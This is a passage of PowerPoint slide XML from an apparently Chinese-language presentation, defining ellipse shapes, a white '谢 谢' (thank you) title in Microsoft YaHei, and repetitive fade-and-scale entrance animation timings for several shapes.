            <a:off x="8350250" y="2389188"/>
            <a:ext cx="77788" cy="777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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="椭圆 44"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9015413" y="3306763"/>
            <a:ext cx="77787" cy="77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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="椭圆 46"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7977188" y="4576763"/>
            <a:ext cx="190500" cy="18891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lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="椭圆 47"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8994775" y="4273550"/>
            <a:ext cx="77788" cy="777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solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="椭圆 49"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5835650" y="3763963"/>
            <a:ext cx="1349375" cy="1349375"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">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1800" b="1" noProof="1">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="椭圆 29"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873624" y="2517775"/>
            <a:ext cx="2609851" cy="2078038"/>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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>谢 谢</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by="(-#ppt_w*2)" calcmode="lin" valueType="num">
                                      <p:cBhvr rctx="PPT">
                                        <p:cTn id="7" dur="250" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:anim>
                                    <p:anim by="(#ppt_w*0.50)" calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="250" decel="50000" autoRev="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:anim>
                                    <p:anim from="(-#ppt_h/2)" to="(#ppt_y)" calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:anim>
                                    <p:animRot by="21600000">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="53" presetClass="entr" presetSubtype="16"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Effect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="29"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="31"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="31" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="36" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="34"/>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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="46" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="200"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="37"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="51" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="38"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="56" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="100"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="40"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="61" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="66" presetID="53" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="300"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="43"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
